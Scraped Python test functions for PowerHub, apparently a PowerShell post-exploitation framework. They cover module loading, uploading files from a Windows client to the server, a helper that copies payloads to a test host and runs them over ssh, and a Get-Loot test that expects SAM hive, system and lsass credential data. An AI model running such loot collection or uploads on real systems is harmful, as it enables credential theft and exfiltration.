Ejemplo n.º 1
def test_load_hubmodule(backend):
    """Load the hub module ``psmod53`` via ``lhm`` and verify what is reported.

    ``backend`` is a fixture that wraps a PowerShell snippet into the
    command string handed to ``execute_cmd``. The snippet loads the module,
    pipes the result through ``fl`` and then calls ``Invoke-Testfunc53``.
    """
    out = execute_cmd(backend("lhm psmod53|fl;Invoke-Testfunc53"))

    # Plain substrings that must show up somewhere in the captured output
    # ("Test53" is presumably printed by Invoke-Testfunc53 -- confirm).
    for needle in ("Test53", "psmod53"):
        assert needle in out

    # One "Key : value" line per module property, each ending in CRLF.
    # The padding before the colon varies, hence the " *".
    field_patterns = (
        "Name *: .*psmod53.ps1\r\n",
        "Type *: ps1\r\n",
        "N *: 72\r\n",
        "Loaded *: True\r\n",
    )
    for pattern in field_patterns:
        assert re.search(pattern, out)
Ejemplo n.º 2
def test_load_hubmodule_range(backend):
    """Load several hub modules by index range and call a function from each.

    The range expression ``72-74,77`` is passed to ``lhm``; afterwards four
    ``Invoke-Testfunc*`` functions are invoked and their markers are
    expected in the combined output.
    """
    command = (
        '$p="72-74,77";lhm $p;'
        "Invoke-Testfunc53;Invoke-Testfunc99;Invoke-Testfunc47;Invoke-Testfunc72;"
    )
    out = execute_cmd(backend(command))

    # The original author notes that the ordering of the modules behind
    # these indices is not understood; only presence is checked here.
    for marker in ("Test53", "Test99", "Test47", "Test72"):
        assert marker in out
Ejemplo n.º 3
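def copy_and_execute(filename, payload, interpreter=""):
    """Copy ``payload`` to the ``win10`` test host and run it there.

    The payload is written to a local temporary file, any previous copy at
    ``C:/Windows/Temp/<filename>`` on the host is deleted, the file is
    transferred with ``scp`` and finally executed over ``ssh``.

    Args:
        filename: File name to use below ``C:/Windows/Temp/`` on the host.
        payload: File content; ``str`` is written in text mode, anything
            else in binary mode.
        interpreter: Optional command placed in front of the remote path.

    Returns:
        Whatever ``execute_cmd`` returns for the final ``ssh`` invocation.

    Notes:
        ``filename`` and ``interpreter`` are interpolated into the command
        strings without quoting. How ``execute_cmd`` runs those strings is
        not visible here, so only fixed, trusted values should be passed.
        The remote copy stays in ``C:/Windows/Temp`` after execution; it is
        only removed by the next call that uses the same ``filename``.
    """
    import os
    import subprocess
    import tempfile

    mode = 'w' if isinstance(payload, str) else 'wb'
    remote_path = f"C:/Windows/Temp/{filename}"

    # delete=False because scp has to open the file by name after we have
    # closed it; the finally block below removes it again so that payload
    # copies do not pile up in the local temp directory.
    tmpf = tempfile.NamedTemporaryFile(mode, delete=False)
    try:
        with tmpf:
            tmpf.write(payload)

        try:
            execute_cmd(f"ssh win10 del {remote_path}")
        except subprocess.CalledProcessError:
            # this happens if the file does not exist
            pass

        execute_cmd(f"scp {tmpf.name} win10:{remote_path}")
    finally:
        os.unlink(tmpf.name)

    return execute_cmd(f"ssh win10 {interpreter} {remote_path}")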
Ejemplo n.º 4
def test_upload(backend):
    """Upload data with ``pth`` and compare what arrives in ``UPLOAD_DIR``.

    Two uploads are exercised under the same randomly generated name: a
    file holding the bytes 1..255, and a string piped into ``pth -name``.
    The second one is expected under the name with ``.1`` appended.
    """
    from powerhub.directories import UPLOAD_DIR

    def stored_bytes(name):
        # Read back what was stored for ``name``.
        with open(os.path.join(UPLOAD_DIR, name), "rb") as fh:
            return fh.read()

    # 30 random hex digits keep the name unique between test runs.
    testfile = "testfile-%030x.dat" % random.randrange(16**30)

    # Upload 1: create a file on the client, upload it, remove it again.
    file_upload = (
        '$p=Join-Path $env:TEMP "%s";'
        '[io.file]::WriteAllBytes($p,(1..255));'
        'pth $p;rm $p'
    ) % testfile
    out = execute_cmd(backend(file_upload))
    time.sleep(1)  # fixed wait before the upload is checked on disk
    assert "At line:" not in out  # "At line:" means PS error
    assert stored_bytes(testfile) == bytes(range(1, 256))

    # Upload 2: pipe a string into pth, reusing the same name.
    pipe_upload = '$p="FooBar123";$p|pth -name %s;' % testfile
    out = execute_cmd(backend(pipe_upload))
    time.sleep(1)
    assert "At line:" not in out  # "At line:" means PS error
    assert stored_bytes(testfile + ".1") == b"FooBar123"
Ejemplo n.º 5
def test_get_loot(backend):
    """Run ``Get-Loot`` and check that exactly one new loot record is stored.

    The newest record must carry ``hive``, ``sysinfo`` and ``lsass`` fields
    containing the markers asserted below.
    """
    from powerhub import sql

    count_before = len(sql.get_loot())

    out = execute_cmd(backend('Get-Loot'))
    assert "At line:" not in out  # "At line:" means PS error

    # An earlier version polled sql.get_loot() once per second for up to
    # 60 s until lsass, hive and sysinfo were all populated; that loop was
    # disabled, so the table is read once, right after the command returns.
    records = sql.get_loot()
    assert count_before + 1 == len(records)

    newest = records[-1]
    for marker in ("Administrator", "500"):
        assert marker in newest.hive
    for marker in ("Microsoft Windows", "isadmin"):
        assert marker in newest.sysinfo
    assert "session_id" in newest.lsass
Ejemplo n.º 6
def test_list_hubmodules(backend):
    """Check that ``lshm`` lists every ``psmod<i>`` test module.

    ``i`` runs from 0 up to, but not including, ``MAX_TEST_MODULE_PS1``.
    """
    out = execute_cmd(backend("lshm"))
    expected_names = ["psmod%d" % index for index in range(MAX_TEST_MODULE_PS1)]
    missing = [name for name in expected_names if name not in out]
    assert not missing
Ejemplo n.º 7
def test_start(backend):
    """Run the backend with an empty command and check the startup text."""
    out = execute_cmd(backend(""))
    # Both strings are expected in the output even though no command was
    # passed -- presumably they are part of the startup banner.
    banner_parts = ("Adrian Vollmer", "Run 'Help-PowerHub' for help")
    for part in banner_parts:
        assert part in out